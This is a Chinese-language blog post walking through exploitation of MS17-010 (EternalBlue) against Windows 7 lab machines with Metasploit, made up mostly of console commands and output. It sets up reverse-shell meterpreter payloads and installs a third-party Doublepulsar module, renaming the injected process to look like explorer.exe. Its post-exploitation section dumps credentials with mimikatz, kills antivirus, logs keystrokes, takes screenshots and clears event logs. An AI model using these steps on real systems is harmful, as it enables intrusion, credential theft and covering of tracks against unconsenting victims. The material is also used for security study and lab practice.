ms17-010
9unk Lv5
  2020-02-03 00:16:50 2020-02-03 00:16      904 字  4 分钟

漏洞复现环境

靶机:windows 7 SP1(64位)、windows 7 SP1(32位)

渗透系统:kali linux

渗透工具:metasploit v5.0.8-dev

扫描目标是否存在漏洞

使用模块 auxiliary/scanner/smb/smb_ms17_010 扫描漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.19.20
RHOSTS => 192.168.19.20
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 192.168.19.20:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.19.20:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

64 位利用

利用攻击模块 exploit/windows/smb/ms17_010_eternalblue 进行渗透

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.19.20
RHOSTS => 192.168.19.20
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.19.19
lhost => 192.168.19.19
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 222
lport => 222
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

32 位利用

  1. 下载 exp
1
# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit&&cd Eternalblue-Doublepulsar-Metasploit
  1. 修改下载的 eternalblue_doublepulsar.rb
  • 改路径

将 /root/Eternalblue-Doublepulsar-Metasploit/deps/改为/usr/share/metasploit-framework/modules/exploits/windows/smb/deps

  • 改进程名称

默认进程名称为 wlms.exe,建议修改为 explorer.exe

ms17010-1.png

  1. 将文件 eternalblue_doublepulsar.rb 和目录 deps 复制到 /usr/share/metasploit-framework/modules/exploits/windows/smb/ 目录
1
# cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
  1. 创建 /root/.wine/drive_c/
1
# mkdir -p /root/.wine/drive_c/
  1. 安装 wine
1
2
3
4
5
6
7
8
9
# dpkg --add-architecture i386

# apt-get update

# apt-get install lib32z1 lib32ncurses5

# apt-get install wine32

# wine cmd.exe
  1. 使用 eternalblue_doublepulsar.rb 模块进行渗透
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf5 > reload_all

msf5 > use exploit/windows/smb/eternalblue_doublepulsar

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set RHOSTS 192.168.19.20
RHOSTS => 192.168.19.20

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.19.19
lhost => 192.168.19.19

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lport 222
lport => 222

msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit

补充说明

ms17010-2.png

如果运行时存在上面的报错时,请多尝试几遍,排查网络是否有问题。

后渗透利用

  1. 使用 mimikatz 获取内存中的用户名和密码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;114889  NTLM       xxx1-PC       xxx1           
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     XXX1-PC$       
0;53638   NTLM                                    
0;999     NTLM       WORKGROUP     XXX1-PC$
  1. 查看系统信息
1
meterpreter > sysinfo
  1. 关闭杀毒软件
1
meterpreter > run  killav
  1. 查看当前进程
1
meterpreter > getpid
  1. 捕获键盘数据
1
2
3
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
  1. 截屏
1
screenshot
  1. 清除事件日志
1
meterpreter > clearev

reference

([MS17-010的利用]https://www.jianshu.com/p/fefcdeb015be)

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

【漏洞利用】使用永恒之蓝的双倍脉冲模块(Eternalblue_doublepulsar)渗透攻击Win_7 32位主机

  • 本文标题:ms17-010
  • 本文作者:9unk
  • 创建时间:2020-02-03 00:16:50
  • 本文链接:https://9unkk.github.io/2020/02/03/ms17-010/
  • 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!